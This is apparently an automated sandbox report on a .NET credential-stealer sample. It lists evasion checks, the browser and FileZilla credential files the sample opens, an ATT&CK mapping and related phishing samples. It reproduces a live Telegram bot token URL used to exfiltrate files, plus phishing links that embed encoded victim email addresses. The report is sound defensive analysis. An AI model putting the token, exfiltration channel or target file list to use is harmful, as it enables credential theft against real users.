      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
      Source: C:\Users\user\Desktop\file.exeMemory allocated: 1E393280000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\Desktop\file.exeMemory allocated: 1E3ACC90000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 600000Jump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 6276Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 6552Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 6480Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 6276Thread sleep time: -600000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 600000Jump to behavior
      Source: file.exe, 00000000.00000002.3892940701.000001E3AD46E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      .NET source code references suspicious native API functions
      Source: file.exe, Mydihutelan.csReference to suspicious API methods: LoadLibrary(Ujybunukycafemijo)
      Source: file.exe, Mydihutelan.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(intPtr, Usinenerusasikyha), typeof(T))
      Source: file.exe, Ykokoninaco.csReference to suspicious API methods: Ugecolehuji.Kernel32.OpenProcess(Ugecolehuji.Ronejohonelokyc.DuplicateHandle, bInheritHandle: true, (uint)Sikebyjogudadodix)
      Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct

      Stealing of Sensitive Information

      barindex
      Yara detected Generic Stealer
      Source: Yara matchFile source: 00000000.00000002.3890665414.000001E394D0B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: file.exe PID: 7140, type: MEMORYSTR
      Tries to harvest and steal browser information (history, passwords, etc)
      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
      Tries to harvest and steal ftp login credentials
      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xmlJump to behavior
      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior

      Remote Access Functionality

      barindex
      Yara detected Generic Stealer
      Source: Yara matchFile source: 00000000.00000002.3890665414.000001E394D0B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: file.exe PID: 7140, type: MEMORYSTR

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts231
      Windows Management Instrumentation      		1
      DLL Side-Loading      		1
      DLL Side-Loading      		1
      Masquerading      		2
      OS Credential Dumping      		231
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		1
      Web Service      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Native API      		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
      Disable or Modify Tools      		LSASS Memory1
      Process Discovery      		Remote Desktop Protocol2
      Data from Local System      		21
      Encrypted Channel      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)251
      Virtualization/Sandbox Evasion      		Security Account Manager251
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive1
      Ingress Tool Transfer      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
      Obfuscated Files or Information      		NTDS123
      System Information Discovery      		Distributed Component Object ModelInput Capture3
      Non-Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading      		LSA SecretsInternet Connection DiscoverySSHKeylogging14
      Application Layer Protocol      		Scheduled TransferData Encrypted for Impact

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      file.exe66%ReversingLabsByteCode-MSIL.Spyware.PhemedroneStealer
      file.exe100%Joe Sandbox ML

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
      https://duckduckgo.com/ac/?q=0%URL Reputationsafe
      http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
      https://www.ecosia.org/newtab/0%URL Reputationsafe
      https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
      http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      get.geojs.io
      		104.26.0.100
      		truefalse
        		unknown
        api.telegram.org
        		149.154.167.220
        		truetrue
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://api.telegram.org/bot6217988193:AAFiJwdcFHDuCM08fAA_dnBQZGLDPSVjUQY/sendDocumentfalse
            		unknown
            https://get.geojs.io/v1/ip/geo.jsonfalse
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000002.3891361029.000001E3A4EDF000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://t.me/file.exe, 00000000.00000002.3891361029.000001E3A5051000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3890665414.000001E394C91000.00000004.00000800.00020000.00000000.sdmpfalse
                		unknown
                https://duckduckgo.com/ac/?q=file.exe, 00000000.00000002.3891361029.000001E3A4EDF000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://t.me/freakcodingspotfile.exe, 00000000.00000002.3891361029.000001E3A5051000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3890665414.000001E394C91000.00000004.00000800.00020000.00000000.sdmpfalse
                  		unknown
                  https://api.telegram.orgfile.exe, 00000000.00000002.3890665414.000001E394D25000.00000004.00000800.00020000.00000000.sdmpfalse
                    		unknown
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000002.3891361029.000001E3A4EDF000.00000004.00000800.00020000.00000000.sdmpfalse
                      		unknown
                      https://api.telegram.org/botfile.exe, 00000000.00000002.3890665414.000001E394D25000.00000004.00000800.00020000.00000000.sdmpfalse
                        		unknown
                        http://schemas.xmlsoap.org/soap/encoding/file.exe, 00000000.00000002.3890665414.000001E394D25000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://t.me/TheDyerfile.exe, 00000000.00000002.3890665414.000001E394EFA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3890665414.000001E394C91000.00000004.00000800.00020000.00000000.sdmpfalse
                          		unknown
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000002.3891361029.000001E3A4EDF000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000002.3891361029.000001E3A4EDF000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://get.geHfile.exe, 00000000.00000002.3890665414.000001E394E73000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            https://www.ecosia.org/newtab/file.exe, 00000000.00000002.3891361029.000001E3A4EDF000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000002.3891361029.000001E3A4EDF000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://get.geojs.iofile.exe, 00000000.00000002.3890665414.000001E394E82000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              https://api.telefile.exe, 00000000.00000002.3890665414.000001E394D25000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000002.3891361029.000001E3A4EDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://schemas.xmlsoap.org/wsdl/file.exe, 00000000.00000002.3890665414.000001E394D25000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://get.geojs.iofile.exe, 00000000.00000002.3890665414.000001E394E73000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3890665414.000001E394C91000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://api.telegram.orgfile.exe, 00000000.00000002.3890665414.000001E394D25000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namefile.exe, 00000000.00000002.3890665414.000001E394C91000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000002.3891361029.000001E3A4EDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://t.me/webster480file.exe, 00000000.00000002.3890665414.000001E394EFA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3890665414.000001E394C91000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      149.154.167.220
                                      		api.telegram.orgUnited Kingdom
                                      		62041TELEGRAMRUtrue
                                      104.26.0.100
                                      		get.geojs.ioUnited States
                                      		13335CLOUDFLARENETUSfalse

                                      General Information

                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1545748
                                      Start date and time:2024-10-30 22:56:04 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 5m 18s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Run name:Run with higher sleep bypass
                                      Number of analysed new started processes analysed:4
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:file.exe
                                      Detection:MAL
                                      Classification:mal88.troj.spyw.evad.winEXE@1/1@2/2
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 98%
                                      • Number of executed functions: 9
                                      • Number of non-executed functions: 0
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                      Warnings

                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      • VT rate limit hit for: file.exe

                                      Simulations

                                      Behavior and APIs

                                      No simulations

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      149.154.167.220PO 4500580954.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                        SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeGet hashmaliciousAgentTeslaBrowse
                                          Factura Honorarios 2024-10.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            Fernissagerne.exeGet hashmaliciousSnake KeyloggerBrowse
                                              JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                9RgE5uOJwX.exeGet hashmaliciousXWormBrowse
                                                  app64.exeGet hashmaliciousUnknownBrowse
                                                    na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        104.26.0.100http://braintumourresearch.orgGet hashmaliciousUnknownBrowse
                                                          https://www.filemail.com/t/NU6GESpWGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                            https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fkeyconserv.com%2Fskoda%2FWIA2PParYO43z1bgCVStAX12/ZHVjZXIua2FtZ2FuZ0BjbmVzc3QuZ291di5xYy5jYQ==Get hashmaliciousUnknownBrowse
                                                              https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fkeyconserv.com%2Fskoda%2Ff1mgxnH4u4JYtjrvS13irZ65/am9zZWUub3VlbGxldEBjbmVzc3QuZ291di5xYy5jYQ==Get hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bg%C2%ADloba%C2%ADlproc%C2%ADessi%C2%ADngne%C2%ADtwo%C2%ADrk.%E2%80%8Bne%C2%ADt%2Ffghd%2Fgfjfjfg%2FlZUdcjNeQOlJngwGts6Dr8m3/Y2hhZC5yYXNtdXNlbkB0aGVybW9zeXN0ZW1zLmNvbQ==Get hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                  https://g.page/r/CbPyKO_ogGK3EAg/reviewGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                    P09Qwe9fqsKdQIyTGnGxNs8xS[1]Get hashmaliciousTycoon2FABrowse
                                                                      Remittance AdviceNote c6b2e2a43485b7b75999a5332e86646fGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                        https://www.google.com/url?q=//www.google.com.br/amp/s/iKL5afRe0S6hy3p0slRKsXiNT5VzWqeGhx.desarrollodigitales.com/xiwitytevd/sotutybgetd/qoguhtunh/I6Gu0C/cWEtc3FpQHF2Y2pwLmNvbQ==Get hashmaliciousHTMLPhisher, Tycoon2FABrowse

                                                                          Domains

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          get.geojs.iohttp://braintumourresearch.orgGet hashmaliciousUnknownBrowse
                                                                          • 104.26.1.100
                                                                          https://www.filemail.com/t/NU6GESpWGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                          • 104.26.0.100
                                                                          https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fkeyconserv.com%2Fskoda%2FWIA2PParYO43z1bgCVStAX12/ZHVjZXIua2FtZ2FuZ0BjbmVzc3QuZ291di5xYy5jYQ==Get hashmaliciousUnknownBrowse
                                                                          • 172.67.70.233
                                                                          https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Ffilmycurry.in%2Fskoda%2FBxs3IiLfKU2eWewQOro8W1Fa/dGVycmkucm9zYUByYXZlaXMuY29tGet hashmaliciousTycoon2FABrowse
                                                                          • 104.26.1.100
                                                                          https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fkeyconserv.com%2Fskoda%2Ff1mgxnH4u4JYtjrvS13irZ65/am9zZWUub3VlbGxldEBjbmVzc3QuZ291di5xYy5jYQ==Get hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                          • 104.26.0.100
                                                                          https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bg%C2%ADloba%C2%ADlproc%C2%ADessi%C2%ADngne%C2%ADtwo%C2%ADrk.%E2%80%8Bne%C2%ADt%2Ffghd%2Fgfjfjfg%2FlZUdcjNeQOlJngwGts6Dr8m3/Y2hhZC5yYXNtdXNlbkB0aGVybW9zeXN0ZW1zLmNvbQ==Get hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                          • 172.67.70.233
                                                                          https://www.google.com/url?q=dCSMjVnvsqsqaP8pEWWm&rct=SpPq9HncUaCXUtCZusX0&sa=t&esrc=uZR6jk9A67Rj7RZhLuPE&source=&cd=eh0xIKCKpKh7i4kTt26p&cad=VEVtMkQKVNr1KW4fxShi&ved=NTDACygNXetEDbRT8YiY&uact=%20&url=amp/mithunaads.in/M%2f45043%2FaGFucy5hbmRlcnNvbkBhZy5zdGF0ZS5tbi51cw==Get hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                          • 104.26.1.100
                                                                          https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bg%C2%ADloba%C2%ADlproc%C2%ADessi%C2%ADngne%C2%ADtwo%C2%ADrk%2E%E2%80%8Bne%C2%ADt%2Ffghd%2Fgfjfjfg%2FBpORLlSyDHhQozoQ5XBZtBNm/dGhvbHplckByZGd1c2EuY29tGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                          • 104.26.1.100
                                                                          https://g.page/r/CbPyKO_ogGK3EAg/reviewGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                          • 172.67.70.233
                                                                          api.telegram.orgPO 4500580954.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                          • 149.154.167.220
                                                                          SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 149.154.167.220
                                                                          Factura Honorarios 2024-10.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                          • 149.154.167.220
                                                                          Fernissagerne.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 149.154.167.220
                                                                          JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                          • 149.154.167.220
                                                                          9RgE5uOJwX.exeGet hashmaliciousXWormBrowse
                                                                          • 149.154.167.220
                                                                          app64.exeGet hashmaliciousUnknownBrowse
                                                                          • 149.154.167.220
                                                                          na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 149.154.167.220
                                                                          na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 149.154.167.220

                                                                          ASNs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          TELEGRAMRUPO 4500580954.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                          • 149.154.167.220
                                                                          SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 149.154.167.220
                                                                          Factura Honorarios 2024-10.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                          • 149.154.167.220
                                                                          Fernissagerne.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 149.154.167.220
                                                                          JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                          • 149.154.167.220
                                                                          9RgE5uOJwX.exeGet hashmaliciousXWormBrowse
                                                                          • 149.154.167.220
                                                                          app64.exeGet hashmaliciousUnknownBrowse
                                                                          • 149.154.167.220
                                                                          na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 149.154.167.220
                                                                          na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 149.154.167.220
                                                                          CLOUDFLARENETUSSecuriteInfo.com.Trojan.PWS.Lumma.749.31391.1681.exeGet hashmaliciousLummaC, DarkTortilla, LummaC StealerBrowse
                                                                          • 104.21.33.140
                                                                          5lg7zd.elfGet hashmaliciousUnknownBrowse
                                                                          • 188.114.97.3
                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                          • 104.21.41.39
                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                          • 188.114.96.3
                                                                          Paiement.emlGet hashmaliciousHTMLPhisherBrowse
                                                                          • 104.18.95.41
                                                                          PO 4500580954.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                          • 188.114.96.3
                                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                          • 188.114.96.3
                                                                          https://pub-6838e3dd185d4df89d3bb3eabe6469a4.r2.dev/index.html#Get hashmaliciousUnknownBrowse
                                                                          • 104.21.48.111
                                                                          SecuriteInfo.com.Trojan.PWS.Lumma.749.8914.14992.exeGet hashmaliciousLummaCBrowse
                                                                          • 104.21.33.140

                                                                          JA3 Fingerprints

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          3b5074b1b5d032e5620f69f9f700ff0ePaiement.emlGet hashmaliciousHTMLPhisherBrowse
                                                                          • 149.154.167.220
                                                                          • 104.26.0.100
                                                                          PO 4500580954.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                          • 149.154.167.220
                                                                          • 104.26.0.100
                                                                          CPYEzG7VGh.exeGet hashmaliciousDCRatBrowse
                                                                          • 149.154.167.220
                                                                          • 104.26.0.100
                                                                          https://jpm-ghana-2024-election-conversation-with-oct-24.open-exchange.net/join-the-call?ml_access_token=eyJjb250ZW50Ijp7ImV4cGlyYXRpb25EYXRlIjoiMjAyNC0xMC0zMVQxNToyMDo1OS4wMDZaIiwiZW1haWwiOiJyZGVpdHpAdnItY2FwaXRhbC5jb20iLCJldmVudElkIjo0MjY3Mn0sInNpZ25hdHVyZSI6Ik1FVUNJQzhaMDJJblVZd0syUk9WRkdjL1pMNHRBbWo4RmwxdW9mQjhwZzRmSjZsMkFpRUE5d25HUFFoa3ZrdkM2MlJkQ3lkM09YbnFJZ0xlQTAwMDIxNlRWbG9Hb0ZjPSJ9Get hashmaliciousUnknownBrowse
                                                                          • 149.154.167.220
                                                                          • 104.26.0.100
                                                                          SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 149.154.167.220
                                                                          • 104.26.0.100
                                                                          http://ffcu.onlineGet hashmaliciousUnknownBrowse
                                                                          • 149.154.167.220
                                                                          • 104.26.0.100
                                                                          file.exeGet hashmaliciousStealc, VidarBrowse
                                                                          • 149.154.167.220
                                                                          • 104.26.0.100
